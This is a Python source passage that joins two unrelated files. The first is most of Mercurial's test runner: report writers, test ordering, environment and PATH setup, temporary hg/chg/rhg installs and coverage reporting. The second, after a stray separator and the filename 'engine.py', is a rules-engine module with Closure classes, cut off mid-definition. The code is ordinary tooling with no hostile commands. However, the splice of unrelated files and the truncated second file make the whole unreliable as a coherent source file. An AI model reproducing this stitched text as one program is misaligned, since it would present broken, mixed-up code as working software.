t.setAttribute("name", tc.name)
tctime = timesd.get(tc.name)
if tctime is not None:
t.setAttribute("time", "%.3f" % tctime)
s.appendChild(t)
for tc, err in sorted(result.faildata.items()):
t = doc.createElement("testcase")
t.setAttribute("name", tc)
tctime = timesd.get(tc)
if tctime is not None:
t.setAttribute("time", "%.3f" % tctime)
# createCDATASection expects a unicode string or it will
# convert using default conversion rules, which will
# fail if the string isn't ASCII.
err = cdatasafe(err).decode("utf-8", "replace")
cd = doc.createCDATASection(err)
# Use 'failure' here instead of 'error' to match errors = 0,
# failures = len(result.failures) in the testsuite element.
failelem = doc.createElement("failure")
failelem.setAttribute("message", "output changed")
failelem.setAttribute("type", "output-mismatch")
failelem.appendChild(cd)
t.appendChild(failelem)
s.appendChild(t)
for tc, message in result.skipped:
# According to the schema, 'skipped' has no attributes. So store
# the skip message as a text node instead.
t = doc.createElement("testcase")
t.setAttribute("name", tc.name)
binmessage = message.encode("utf-8")
message = cdatasafe(binmessage).decode("utf-8", "replace")
cd = doc.createCDATASection(message)
skipelem = doc.createElement("skipped")
skipelem.appendChild(cd)
t.appendChild(skipelem)
s.appendChild(t)
outf.write(doc.toprettyxml(indent=" ", encoding="utf-8"))
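# The emitted document looks roughly like this (abridged, values made up):
#   <testsuite name="run-tests" tests="3" failures="1" skipped="1" errors="0">
#     <testcase name="test-a.t" time="1.234"/>
#     <testcase name="test-b.t">
#       <failure message="output changed" type="output-mismatch">
#         <![CDATA[...diff...]]></failure>
#     </testcase>
#     <testcase name="test-c.t">
#       <skipped><![CDATA[missing feature: serve]]></skipped>
#     </testcase>
#   </testsuite>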
@staticmethod
def _writejson(result, outf):
timesd = {}
for tdata in result.times:
test = tdata[0]
timesd[test] = tdata[1:]
outcome = {}
groups = [
("success", ((tc, None) for tc in result.successes)),
("failure", result.failures),
("skip", result.skipped),
]
for res, testcases in groups:
for tc, __ in testcases:
if tc.name in timesd:
diff = result.faildata.get(tc.name, b"")
try:
diff = diff.decode("unicode_escape")
except UnicodeDecodeError as e:
diff = "%r decoding diff, sorry" % e
tres = {
"result": res,
"time": ("%0.3f" % timesd[tc.name][2]),
"cuser": ("%0.3f" % timesd[tc.name][0]),
"csys": ("%0.3f" % timesd[tc.name][1]),
"start": ("%0.3f" % timesd[tc.name][3]),
"end": ("%0.3f" % timesd[tc.name][4]),
"diff": diff,
}
else:
# blacklisted test
tres = {"result": res}
outcome[tc.name] = tres
jsonout = json.dumps(outcome, sort_keys=True, indent=4, separators=(",", ": "))
outf.writelines(("testreport =", jsonout))
def sorttests(testdescs, previoustimes, shuffle=False):
"""Do an in-place sort of tests."""
if shuffle:
random.shuffle(testdescs)
return
if previoustimes:
def sortkey(f):
f = f["path"]
if f in previoustimes:
# Use most recent time as estimate
return -(previoustimes[f][-1])
else:
# Default to a rather arbitrary value of 1 second for new tests
return -1.0
else:
# keywords for slow tests
slow = {
b"svn": 10,
b"cvs": 10,
b"hghave": 10,
b"largefiles-update": 10,
b"run-tests": 10,
b"corruption": 10,
b"race": 10,
b"i18n": 10,
b"check": 100,
b"gendoc": 100,
b"contrib-perf": 200,
b"merge-combination": 100,
}
perf = {}
def sortkey(f):
# run largest tests first, as they tend to take the longest
f = f["path"]
try:
return perf[f]
except KeyError:
try:
val = -os.stat(f).st_size
except OSError as e:
if e.errno != errno.ENOENT:
raise
perf[f] = -1e9 # file does not exist, tell early
return -1e9
for kw, mul in slow.items():
if kw in f:
val *= mul
if f.endswith(b".py"):
val /= 10.0
perf[f] = val / 1000.0
return perf[f]
testdescs.sort(key=sortkey)
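# Worked example of the size-based key (numbers made up): a 4000-byte test
# whose name contains b"run-tests" gets val = -4000 * 10 = -40000, stored as
# -40.0 after the /1000.0 scaling, so it sorts ahead of an ordinary
# 4000-byte test at -4.0; a .py test of the same size would additionally be
# divided by 10.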
class TestRunner(object):
"""Holds context for executing tests.
Tests rely on a lot of state. This object holds it for them.
"""
# Programs required to run tests.
REQUIREDTOOLS = [
b"diff",
b"grep",
b"unzip",
b"gunzip",
b"bunzip2",
b"sed",
]
# Maps file extensions to test class.
TESTTYPES = [
(b".py", PythonTest),
(b".t", TTest),
]
def __init__(self):
self.options = None
self._hgroot = None
self._testdir = None
self._outputdir = None
self._hgtmp = None
self._installdir = None
self._bindir = None
self._tmpbindir = None
self._pythondir = None
self._coveragefile = None
self._createdfiles = []
self._hgcommand = None
self._hgpath = None
self._portoffset = 0
self._ports = {}
def run(self, args, parser=None):
"""Run the test suite."""
oldmask = os.umask(0o22)
try:
parser = parser or getparser()
options = parseargs(args, parser)
tests = [_sys2bytes(a) for a in options.tests]
if options.test_list is not None:
for listfile in options.test_list:
with open(listfile, "rb") as f:
tests.extend(t for t in f.read().splitlines() if t)
self.options = options
self._checktools()
testdescs = self.findtests(tests)
if options.profile_runner:
import statprof
statprof.start()
result = self._run(testdescs)
if options.profile_runner:
statprof.stop()
statprof.display()
return result
finally:
os.umask(oldmask)
def _run(self, testdescs):
testdir = getcwdb()
self._testdir = osenvironb[b"TESTDIR"] = getcwdb()
# assume all tests in same folder for now
if testdescs:
pathname = os.path.dirname(testdescs[0]["path"])
if pathname:
testdir = os.path.join(testdir, pathname)
self._testdir = osenvironb[b"TESTDIR"] = testdir
if self.options.outputdir:
self._outputdir = canonpath(_sys2bytes(self.options.outputdir))
else:
self._outputdir = getcwdb()
if testdescs and pathname:
self._outputdir = os.path.join(self._outputdir, pathname)
previoustimes = {}
if self.options.order_by_runtime:
previoustimes = dict(loadtimes(self._outputdir))
sorttests(testdescs, previoustimes, shuffle=self.options.random)
if "PYTHONHASHSEED" not in os.environ:
# use a random Python hash seed all the time;
# we do the randomness ourselves so we know what seed is used
os.environ["PYTHONHASHSEED"] = str(random.getrandbits(32))
# Rayon (Rust crate for multi-threading) will use all logical CPU cores
# by default, causing thrashing on high-cpu-count systems.
# Setting its limit to 3 during tests should still let us uncover
# multi-threading bugs while keeping the thrashing reasonable.
os.environ.setdefault("RAYON_NUM_THREADS", "3")
if self.options.tmpdir:
self.options.keep_tmpdir = True
tmpdir = _sys2bytes(self.options.tmpdir)
if os.path.exists(tmpdir):
# Meaning of tmpdir has changed since 1.3: we used to create
# HGTMP inside tmpdir; now HGTMP is tmpdir. So fail if
# tmpdir already exists.
print("error: temp dir %r already exists" % tmpdir)
return 1
os.makedirs(tmpdir)
else:
d = None
if os.name == "nt":
# without this, we get the default temp dir location, but
# in all lowercase, which causes trouble with paths (issue3490)
d = osenvironb.get(b"TMP", None)
tmpdir = tempfile.mkdtemp(b"", b"hgtests.", d)
self._hgtmp = osenvironb[b"HGTMP"] = os.path.realpath(tmpdir)
if self.options.with_hg:
self._installdir = None
whg = self.options.with_hg
self._bindir = os.path.dirname(os.path.realpath(whg))
assert isinstance(self._bindir, bytes)
self._hgcommand = os.path.basename(whg)
self._tmpbindir = os.path.join(self._hgtmp, b"install", b"bin")
os.makedirs(self._tmpbindir)
normbin = os.path.normpath(os.path.abspath(whg))
normbin = normbin.replace(_sys2bytes(os.sep), b"/")
# Other Python scripts in the test harness need to
# `import mercurial`. If `hg` is a Python script, we assume
# the Mercurial modules are relative to its path and tell the tests
# to load Python modules from its directory.
with open(whg, "rb") as fh:
initial = fh.read(1024)
if re.match(b"#!.*python", initial):
self._pythondir = self._bindir
# If it looks like our in-repo Rust binary, use the source root.
# This is a bit hacky. But rhg is still not supported outside the
# source directory. So until it is, do the simple thing.
elif re.search(b"/rust/target/[^/]+/hg", normbin):
self._pythondir = os.path.dirname(self._testdir)
# Fall back to the legacy behavior.
else:
self._pythondir = self._bindir
else:
self._installdir = os.path.join(self._hgtmp, b"install")
self._bindir = os.path.join(self._installdir, b"bin")
self._hgcommand = b"hg"
self._tmpbindir = self._bindir
self._pythondir = os.path.join(self._installdir, b"lib", b"python")
# Force the use of hg.exe instead of relying on MSYS to recognize hg is
# a python script and feed it to python.exe. Legacy stdio is force
# enabled by hg.exe, and this is a more realistic way to launch hg
# anyway.
if os.name == "nt" and not self._hgcommand.endswith(b".exe"):
self._hgcommand += b".exe"
# set CHGHG, then replace "hg" command by "chg"
chgbindir = self._bindir
if self.options.chg or self.options.with_chg:
osenvironb[b"CHGHG"] = os.path.join(self._bindir, self._hgcommand)
else:
osenvironb.pop(b"CHGHG", None) # drop flag for hghave
if self.options.chg:
self._hgcommand = b"chg"
elif self.options.with_chg:
chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg))
self._hgcommand = os.path.basename(self.options.with_chg)
# configure fallback and replace "hg" command by "rhg"
rhgbindir = self._bindir
if self.options.rhg or self.options.with_rhg:
# Affects hghave.py
osenvironb[b"RHG_INSTALLED_AS_HG"] = b"1"
# Affects configuration. Alternatives would be setting configuration through
# `$HGRCPATH` but some tests override that, or changing `_hgcommand` to include
# `--config` but that disrupts tests that print command lines and check expected
# output.
osenvironb[b"RHG_ON_UNSUPPORTED"] = b"fallback"
osenvironb[b"RHG_FALLBACK_EXECUTABLE"] = os.path.join(
self._bindir, self._hgcommand
)
if self.options.rhg:
self._hgcommand = b"rhg"
elif self.options.with_rhg:
rhgbindir = os.path.dirname(os.path.realpath(self.options.with_rhg))
self._hgcommand = os.path.basename(self.options.with_rhg)
osenvironb[b"BINDIR"] = self._bindir
osenvironb[b"PYTHON"] = PYTHON
fileb = _sys2bytes(__file__)
runtestdir = os.path.abspath(os.path.dirname(fileb))
osenvironb[b"RUNTESTDIR"] = runtestdir
if PYTHON3:
sepb = _sys2bytes(os.pathsep)
else:
sepb = os.pathsep
path = [self._bindir, runtestdir] + osenvironb[b"PATH"].split(sepb)
if os.path.islink(__file__):
# test helper will likely be at the end of the symlink
realfile = os.path.realpath(fileb)
realdir = os.path.abspath(os.path.dirname(realfile))
path.insert(2, realdir)
if chgbindir != self._bindir:
path.insert(1, chgbindir)
if rhgbindir != self._bindir:
path.insert(1, rhgbindir)
if self._testdir != runtestdir:
path = [self._testdir] + path
if self._tmpbindir != self._bindir:
path = [self._tmpbindir] + path
osenvironb[b"PATH"] = sepb.join(path)
# Include TESTDIR in PYTHONPATH so that out-of-tree extensions
# can run .../tests/run-tests.py test-foo where test-foo
# adds an extension to HGRC. Also include the run-tests.py directory
# to import modules like heredoctest.
pypath = [self._pythondir, self._testdir, runtestdir]
# We have to augment PYTHONPATH, rather than simply replacing
# it, in case external libraries are only available via current
# PYTHONPATH. (In particular, the Subversion bindings on OS X
# are in /opt/subversion.)
oldpypath = osenvironb.get(IMPL_PATH)
if oldpypath:
pypath.append(oldpypath)
osenvironb[IMPL_PATH] = sepb.join(pypath)
if self.options.pure:
os.environ["HGTEST_RUN_TESTS_PURE"] = "--pure"
os.environ["HGMODULEPOLICY"] = "py"
if self.options.rust:
os.environ["HGMODULEPOLICY"] = "rust+c"
if self.options.no_rust:
current_policy = os.environ.get("HGMODULEPOLICY", "")
if current_policy.startswith("rust+"):
os.environ["HGMODULEPOLICY"] = current_policy[len("rust+") :]
os.environ.pop("HGWITHRUSTEXT", None)
if self.options.allow_slow_tests:
os.environ["HGTEST_SLOW"] = "slow"
elif "HGTEST_SLOW" in os.environ:
del os.environ["HGTEST_SLOW"]
self._coveragefile = os.path.join(self._testdir, b".coverage")
if self.options.exceptions:
exceptionsdir = os.path.join(self._outputdir, b"exceptions")
try:
os.makedirs(exceptionsdir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
# Remove all existing exception reports.
for f in os.listdir(exceptionsdir):
os.unlink(os.path.join(exceptionsdir, f))
osenvironb[b"HGEXCEPTIONSDIR"] = exceptionsdir
logexceptions = os.path.join(self._testdir, b"logexceptions.py")
self.options.extra_config_opt.append(
"extensions.logexceptions=%s" % logexceptions.decode("utf-8")
)
vlog("# Using TESTDIR", _bytes2sys(self._testdir))
vlog("# Using RUNTESTDIR", _bytes2sys(osenvironb[b"RUNTESTDIR"]))
vlog("# Using HGTMP", _bytes2sys(self._hgtmp))
vlog("# Using PATH", os.environ["PATH"])
vlog(
"# Using",
_bytes2sys(IMPL_PATH),
_bytes2sys(osenvironb[IMPL_PATH]),
)
vlog("# Writing to directory", _bytes2sys(self._outputdir))
try:
return self._runtests(testdescs) or 0
finally:
time.sleep(0.1)
self._cleanup()
def findtests(self, args):
"""Finds possible test files from arguments.
If you wish to inject custom tests into the test harness, this would
be a good function to monkeypatch or override in a derived class.
"""
if not args:
if self.options.changed:
proc = Popen4(
b'hg st --rev "%s" -man0 .' % _sys2bytes(self.options.changed),
None,
0,
)
stdout, stderr = proc.communicate()
args = stdout.strip(b"\0").split(b"\0")
else:
args = os.listdir(b".")
expanded_args = []
for arg in args:
if os.path.isdir(arg):
if not arg.endswith(b"/"):
arg += b"/"
expanded_args.extend([arg + a for a in os.listdir(arg)])
else:
expanded_args.append(arg)
args = expanded_args
testcasepattern = re.compile(br"([\w-]+\.t|py)(?:#([a-zA-Z0-9_\-.#]+))")
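# The pattern accepts arguments such as b"test-foo.t#case-a#case-b"
# (name made up): the part before the first "#" is the test file and the
# rest is split into the individual case labels below.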
tests = []
for t in args:
case = []
if not (
os.path.basename(t).startswith(b"test-")
and (t.endswith(b".py") or t.endswith(b".t"))
):
m = testcasepattern.match(os.path.basename(t))
if m is not None:
t_basename, casestr = m.groups()
t = os.path.join(os.path.dirname(t), t_basename)
if casestr:
case = casestr.split(b"#")
else:
continue
if t.endswith(b".t"):
# .t file may contain multiple test cases
casedimensions = parsettestcases(t)
if casedimensions:
cases = []
def addcases(case, casedimensions):
if not casedimensions:
cases.append(case)
else:
for c in casedimensions[0]:
addcases(case + [c], casedimensions[1:])
addcases([], casedimensions)
if case and case in cases:
cases = [case]
elif case:
# Ignore invalid cases
cases = []
else:
pass
tests += [{"path": t, "case": c} for c in sorted(cases)]
else:
tests.append({"path": t})
else:
tests.append({"path": t})
if self.options.retest:
retest_args = []
for test in tests:
errpath = self._geterrpath(test)
if os.path.exists(errpath):
retest_args.append(test)
tests = retest_args
return tests
def _runtests(self, testdescs):
def _reloadtest(test, i):
# convert a test back to its description dict
desc = {"path": test.path}
case = getattr(test, "_case", [])
if case:
desc["case"] = case
return self._gettest(desc, i)
try:
if self.options.restart:
orig = list(testdescs)
while testdescs:
desc = testdescs[0]
errpath = self._geterrpath(desc)
if os.path.exists(errpath):
break
testdescs.pop(0)
if not testdescs:
print("running all tests")
testdescs = orig
tests = [self._gettest(d, i) for i, d in enumerate(testdescs)]
num_tests = len(tests) * self.options.runs_per_test
jobs = min(num_tests, self.options.jobs)
failed = False
kws = self.options.keywords
if kws is not None and PYTHON3:
kws = kws.encode("utf-8")
suite = TestSuite(
self._testdir,
jobs=jobs,
whitelist=self.options.whitelisted,
blacklist=self.options.blacklist,
keywords=kws,
loop=self.options.loop,
runs_per_test=self.options.runs_per_test,
showchannels=self.options.showchannels,
tests=tests,
loadtest=_reloadtest,
)
verbosity = 1
if self.options.list_tests:
verbosity = 0
elif self.options.verbose:
verbosity = 2
runner = TextTestRunner(self, verbosity=verbosity)
if self.options.list_tests:
result = runner.listtests(suite)
else:
if self._installdir:
self._installhg()
self._checkhglib("Testing")
else:
self._usecorrectpython()
if self.options.chg:
assert self._installdir
self._installchg()
if self.options.rhg:
assert self._installdir
self._installrhg()
log("running %d tests using %d parallel processes" % (num_tests, jobs))
result = runner.run(suite)
if result.failures or result.errors:
failed = True
result.onEnd()
if self.options.anycoverage:
self._outputcoverage()
except KeyboardInterrupt:
failed = True
print("\ninterrupted!")
if failed:
return 1
def _geterrpath(self, test):
# test['path'] is a relative path
if "case" in test:
# for multiple dimensions test cases
casestr = b"#".join(test["case"])
errpath = b"%s#%s.err" % (test["path"], casestr)
else:
errpath = b"%s.err" % test["path"]
if self.options.outputdir:
self._outputdir = canonpath(_sys2bytes(self.options.outputdir))
errpath = os.path.join(self._outputdir, errpath)
return errpath
def _getport(self, count):
port = self._ports.get(count) # do we have a cached entry?
if port is None:
portneeded = 3
# after 100 tries we just give up and let the test report the failure
for tries in xrange(100):
allfree = True
port = self.options.port + self._portoffset
for idx in xrange(portneeded):
if not checkportisavailable(port + idx):
allfree = False
break
self._portoffset += portneeded
if allfree:
break
self._ports[count] = port
return port
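# For example (hypothetical numbers): with --port 20059 the first test gets
# HGPORT=20059, HGPORT1=20060 and HGPORT2=20061; if any of the three is
# already in use, the whole block is skipped and the next candidate block
# starts at 20062.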
def _gettest(self, testdesc, count):
"""Obtain a Test by looking at its filename.
Returns a Test instance. The Test may not be runnable if it doesn't
map to a known type.
"""
path = testdesc["path"]
lctest = path.lower()
testcls = Test
for ext, cls in self.TESTTYPES:
if lctest.endswith(ext):
testcls = cls
break
refpath = os.path.join(getcwdb(), path)
tmpdir = os.path.join(self._hgtmp, b"child%d" % count)
# extra keyword parameters. 'case' is used by .t tests
kwds = {k: testdesc[k] for k in ["case"] if k in testdesc}
t = testcls(
refpath,
self._outputdir,
tmpdir,
keeptmpdir=self.options.keep_tmpdir,
debug=self.options.debug,
first=self.options.first,
timeout=self.options.timeout,
startport=self._getport(count),
extraconfigopts=self.options.extra_config_opt,
shell=self.options.shell,
hgcommand=self._hgcommand,
usechg=bool(self.options.with_chg or self.options.chg),
chgdebug=self.options.chg_debug,
useipv6=useipv6,
**kwds
)
t.should_reload = True
return t
def _cleanup(self):
"""Clean up state from this test invocation."""
if self.options.keep_tmpdir:
return
vlog("# Cleaning up HGTMP", _bytes2sys(self._hgtmp))
shutil.rmtree(self._hgtmp, True)
for f in self._createdfiles:
try:
os.remove(f)
except OSError:
pass
def _usecorrectpython(self):
"""Configure the environment to use the appropriate Python in tests."""
# Tests must use the same interpreter as us or bad things will happen.
pyexename = sys.platform == "win32" and b"python.exe" or b"python3"
# os.symlink() is a thing with py3 on Windows, but it requires
# Administrator rights.
if getattr(os, "symlink", None) and os.name != "nt":
vlog(
"# Making python executable in test path a symlink to '%s'"
% sysexecutable
)
mypython = os.path.join(self._tmpbindir, pyexename)
try:
if os.readlink(mypython) == sysexecutable:
return
os.unlink(mypython)
except OSError as err:
if err.errno != errno.ENOENT:
raise
if self._findprogram(pyexename) != sysexecutable:
try:
os.symlink(sysexecutable, mypython)
self._createdfiles.append(mypython)
except OSError as err:
# child processes may race, which is harmless
if err.errno != errno.EEXIST:
raise
else:
# Windows doesn't have `python3.exe`, and MSYS cannot understand the
# reparse point with that name provided by Microsoft. Create a
# simple script on PATH with that name that delegates to the py3
# launcher so the shebang lines work.
if os.getenv("MSYSTEM"):
with open(osenvironb[b"RUNTESTDIR"] + b"/python3", "wb") as f:
f.write(b"#!/bin/sh\n")
f.write(b'py -3 "$@"\n')
exedir, exename = os.path.split(sysexecutable)
vlog(
"# Modifying search path to find %s as %s in '%s'"
% (exename, pyexename, exedir)
)
path = os.environ["PATH"].split(os.pathsep)
while exedir in path:
path.remove(exedir)
# Binaries installed by pip into the user area like pylint.exe may
# not be in PATH by default.
extra_paths = [exedir]
vi = sys.version_info
if "APPDATA" in os.environ:
scripts_dir = os.path.join(
os.environ["APPDATA"],
"Python",
"Python%d%d" % (vi[0], vi[1]),
"Scripts",
)
if vi.major == 2:
scripts_dir = os.path.join(
os.environ["APPDATA"],
"Python",
"Scripts",
)
extra_paths.append(scripts_dir)
os.environ["PATH"] = os.pathsep.join(extra_paths + path)
if not self._findprogram(pyexename):
print("WARNING: Cannot find %s in search path" % pyexename)
def _installhg(self):
"""Install hg into the test environment.
This will also configure hg with the appropriate testing settings.
"""
vlog("# Performing temporary installation of HG")
installerrs = os.path.join(self._hgtmp, b"install.err")
compiler = ""
if self.options.compiler:
compiler = "--compiler " + self.options.compiler
setup_opts = b""
if self.options.pure:
setup_opts = b"--pure"
elif self.options.rust:
setup_opts = b"--rust"
elif self.options.no_rust:
setup_opts = b"--no-rust"
# Run installer in hg root
script = os.path.realpath(sys.argv[0])
exe = sysexecutable
if PYTHON3:
compiler = _sys2bytes(compiler)
script = _sys2bytes(script)
exe = _sys2bytes(exe)
hgroot = os.path.dirname(os.path.dirname(script))
self._hgroot = hgroot
os.chdir(hgroot)
nohome = b'--home=""'
if os.name == "nt":
# The --home="" trick works only on OS where os.sep == '/'
# because of a distutils convert_path() fast-path. Avoid it at
# least on Windows for now, deal with .pydistutils.cfg bugs
# when they happen.
nohome = b""
cmd = (
b'"%(exe)s" setup.py %(setup_opts)s clean --all'
b' build %(compiler)s --build-base="%(base)s"'
b' install --force --prefix="%(prefix)s"'
b' --install-lib="%(libdir)s"'
b' --install-scripts="%(bindir)s" %(nohome)s >%(logfile)s 2>&1'
% {
b"exe": exe,
b"setup_opts": setup_opts,
b"compiler": compiler,
b"base": os.path.join(self._hgtmp, b"build"),
b"prefix": self._installdir,
b"libdir": self._pythondir,
b"bindir": self._bindir,
b"nohome": nohome,
b"logfile": installerrs,
}
)
# setuptools requires install directories to exist.
def makedirs(p):
try:
os.makedirs(p)
except OSError as e:
if e.errno != errno.EEXIST:
raise
makedirs(self._pythondir)
makedirs(self._bindir)
vlog("# Running", cmd.decode("utf-8"))
if subprocess.call(_bytes2sys(cmd), shell=True) == 0:
if not self.options.verbose:
try:
os.remove(installerrs)
except OSError as e:
if e.errno != errno.ENOENT:
raise
else:
with open(installerrs, "rb") as f:
for line in f:
if PYTHON3:
sys.stdout.buffer.write(line)
else:
sys.stdout.write(line)
sys.exit(1)
os.chdir(self._testdir)
self._usecorrectpython()
hgbat = os.path.join(self._bindir, b"hg.bat")
if os.path.isfile(hgbat):
            # hg.bat expects to be put in bin/scripts while run-tests.py
            # installation layout puts it in bin/ directly. Fix it
with open(hgbat, "rb") as f:
data = f.read()
if br'"%~dp0..\python" "%~dp0hg" %*' in data:
data = data.replace(
br'"%~dp0..\python" "%~dp0hg" %*',
b'"%~dp0python" "%~dp0hg" %*',
)
with open(hgbat, "wb") as f:
f.write(data)
else:
print("WARNING: cannot fix hg.bat reference to python.exe")
if self.options.anycoverage:
custom = os.path.join(osenvironb[b"RUNTESTDIR"], b"sitecustomize.py")
target = os.path.join(self._pythondir, b"sitecustomize.py")
vlog("# Installing coverage trigger to %s" % target)
shutil.copyfile(custom, target)
rc = os.path.join(self._testdir, b".coveragerc")
vlog("# Installing coverage rc to %s" % rc)
osenvironb[b"COVERAGE_PROCESS_START"] = rc
covdir = os.path.join(self._installdir, b"..", b"coverage")
try:
os.mkdir(covdir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
osenvironb[b"COVERAGE_DIR"] = covdir
def _checkhglib(self, verb):
"""Ensure that the 'mercurial' package imported by python is
the one we expect it to be. If not, print a warning to stderr."""
if (self._bindir == self._pythondir) and (self._bindir != self._tmpbindir):
# The pythondir has been inferred from --with-hg flag.
# We cannot expect anything sensible here.
return
expecthg = os.path.join(self._pythondir, b"mercurial")
actualhg = self._gethgpath()
if os.path.abspath(actualhg) != os.path.abspath(expecthg):
sys.stderr.write(
"warning: %s with unexpected mercurial lib: %s\n"
" (expected %s)\n" % (verb, actualhg, expecthg)
)
def _gethgpath(self):
"""Return the path to the mercurial package that is actually found by
the current Python interpreter."""
if self._hgpath is not None:
return self._hgpath
cmd = b'"%s" -c "import mercurial; print (mercurial.__path__[0])"'
cmd = cmd % PYTHON
if PYTHON3:
cmd = _bytes2sys(cmd)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
out, err = p.communicate()
self._hgpath = out.strip()
return self._hgpath
def _installchg(self):
"""Install chg into the test environment"""
vlog("# Performing temporary installation of CHG")
assert os.path.dirname(self._bindir) == self._installdir
assert self._hgroot, "must be called after _installhg()"
cmd = b'"%(make)s" clean install PREFIX="%(prefix)s"' % {
b"make": b"make", # TODO: switch by option or environment?
b"prefix": self._installdir,
}
cwd = os.path.join(self._hgroot, b"contrib", b"chg")
vlog("# Running", cmd)
proc = subprocess.Popen(
cmd,
shell=True,
cwd=cwd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
out, _err = proc.communicate()
if proc.returncode != 0:
if PYTHON3:
sys.stdout.buffer.write(out)
else:
sys.stdout.write(out)
sys.exit(1)
def _installrhg(self):
"""Install rhg into the test environment"""
vlog("# Performing temporary installation of rhg")
assert os.path.dirname(self._bindir) == self._installdir
assert self._hgroot, "must be called after _installhg()"
cmd = b'"%(make)s" install-rhg PREFIX="%(prefix)s"' % {
b"make": b"make", # TODO: switch by option or environment?
b"prefix": self._installdir,
}
cwd = self._hgroot
vlog("# Running", cmd)
proc = subprocess.Popen(
cmd,
shell=True,
cwd=cwd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
out, _err = proc.communicate()
if proc.returncode != 0:
if PYTHON3:
sys.stdout.buffer.write(out)
else:
sys.stdout.write(out)
sys.exit(1)
def _outputcoverage(self):
"""Produce code coverage output."""
import coverage
coverage = coverage.coverage
vlog("# Producing coverage report")
# chdir is the easiest way to get short, relative paths in the
# output.
os.chdir(self._hgroot)
covdir = os.path.join(_bytes2sys(self._installdir), "..", "coverage")
cov = coverage(data_file=os.path.join(covdir, "cov"))
# Map install directory paths back to source directory.
cov.config.paths["srcdir"] = [".", _bytes2sys(self._pythondir)]
cov.combine()
omit = [
_bytes2sys(os.path.join(x, b"*")) for x in [self._bindir, self._testdir]
]
cov.report(ignore_errors=True, omit=omit)
if self.options.htmlcov:
htmldir = os.path.join(_bytes2sys(self._outputdir), "htmlcov")
cov.html_report(directory=htmldir, omit=omit)
if self.options.annotate:
adir = os.path.join(_bytes2sys(self._outputdir), "annotated")
if not os.path.isdir(adir):
os.mkdir(adir)
cov.annotate(directory=adir, omit=omit)
def _findprogram(self, program):
"""Search PATH for a executable program"""
dpb = _sys2bytes(os.defpath)
sepb = _sys2bytes(os.pathsep)
for p in osenvironb.get(b"PATH", dpb).split(sepb):
name = os.path.join(p, program)
if os.name == "nt" or os.access(name, os.X_OK):
return _bytes2sys(name)
return None
def _checktools(self):
"""Ensure tools required to run tests are present."""
for p in self.REQUIREDTOOLS:
if os.name == "nt" and not p.endswith(b".exe"):
p += b".exe"
found = self._findprogram(p)
p = p.decode("utf-8")
if found:
vlog("# Found prerequisite", p, "at", found)
else:
print("WARNING: Did not find prerequisite tool: %s " % p)
def aggregateexceptions(path):
exceptioncounts = collections.Counter()
testsbyfailure = collections.defaultdict(set)
failuresbytest = collections.defaultdict(set)
for f in os.listdir(path):
with open(os.path.join(path, f), "rb") as fh:
data = fh.read().split(b"\0")
if len(data) != 5:
continue
exc, mainframe, hgframe, hgline, testname = data
exc = exc.decode("utf-8")
mainframe = mainframe.decode("utf-8")
hgframe = hgframe.decode("utf-8")
hgline = hgline.decode("utf-8")
testname = testname.decode("utf-8")
key = (hgframe, hgline, exc)
exceptioncounts[key] += 1
testsbyfailure[key].add(testname)
failuresbytest[testname].add(key)
# Find test having fewest failures for each failure.
leastfailing = {}
for key, tests in testsbyfailure.items():
fewesttest = None
fewestcount = 99999999
for test in sorted(tests):
if len(failuresbytest[test]) < fewestcount:
fewesttest = test
fewestcount = len(failuresbytest[test])
leastfailing[key] = (fewestcount, fewesttest)
# Create a combined counter so we can sort by total occurrences and
# impacted tests.
combined = {}
for key in exceptioncounts:
combined[key] = (
exceptioncounts[key],
len(testsbyfailure[key]),
leastfailing[key][0],
leastfailing[key][1],
)
return {
"exceptioncounts": exceptioncounts,
"total": sum(exceptioncounts.values()),
"combined": combined,
"leastfailing": leastfailing,
"byfailure": testsbyfailure,
"bytest": failuresbytest,
}
if __name__ == "__main__":
runner = TestRunner()
try:
import msvcrt
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
except ImportError:
pass
sys.exit(runner.run(sys.argv[1:]))
|
engine.py
|
import json
import copy
import rules
import threading
import inspect
import random
import time
import datetime
import os
import sys
import traceback
def _unix_now():
dt = datetime.datetime.now()
epoch = datetime.datetime.utcfromtimestamp(0)
delta = dt - epoch
return delta.total_seconds()
class Closure_Queue(object):
def __init__(self):
self._queued_posts = []
self._queued_asserts = []
self._queued_retracts = []
def get_queued_posts(self):
return self._queued_posts
    def get_queued_asserts(self):
        return self._queued_asserts
    def get_queued_retracts(self):
        return self._queued_retracts
def post(self, message):
if isinstance(message, Content):
message = message._d
self._queued_posts.append(message)
def assert_fact(self, message):
if isinstance(message, Content):
message = message._d
self._queued_asserts.append(message)
def retract_fact(self, message):
if isinstance(message, Content):
message = message._d
self._queued_retracts.append(message)
class Closure(object):
def __init__(self, host, state, message, handle, ruleset_name):
self.ruleset_name = ruleset_name
self.host = host
self.s = Content(state)
self._handle = handle
self._timer_directory = {}
self._cancelled_timer_directory = {}
self._message_directory = {}
self._queue_directory = {}
self._branch_directory = {}
self._fact_directory = {}
self._delete_directory = {}
self._retract_directory = {}
self._completed = False
self._deleted = False
self._start_time = _unix_now()
if isinstance(message, dict):
self._m = message
else:
self.m = []
for one_message in message:
if ('m' in one_message) and len(one_message) == 1:
one_message = one_message['m']
self.m.append(Content(one_message))
def get_timers(self):
return self._timer_directory
def get_cancelled_timers(self):
return self._cancelled_timer_directory
def get_branches(self):
return self._branch_directory
def get_messages(self):
return self._message_directory
def get_queues(self):
return self._queue_directory
def get_deletes(self):
return self._delete_directory
def get_facts(self):
return self._fact_directory
def get_retract_facts(self):
return self._retract_directory
def get_queue(self, ruleset_name):
if not ruleset_name in self._queue_directory:
self._queue_directory[ruleset_name] = Closure_Queue()
return self._queue_directory[ruleset_name]
def post(self, ruleset_name, message = None):
if not message:
message = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in message:
message['sid'] = self.s.sid
if isinstance(message, Content):
message = message._d
message_list = []
if ruleset_name in self._message_directory:
message_list = self._message_directory[ruleset_name]
else:
self._message_directory[ruleset_name] = message_list
message_list.append(message)
def delete(self, ruleset_name = None, sid = None):
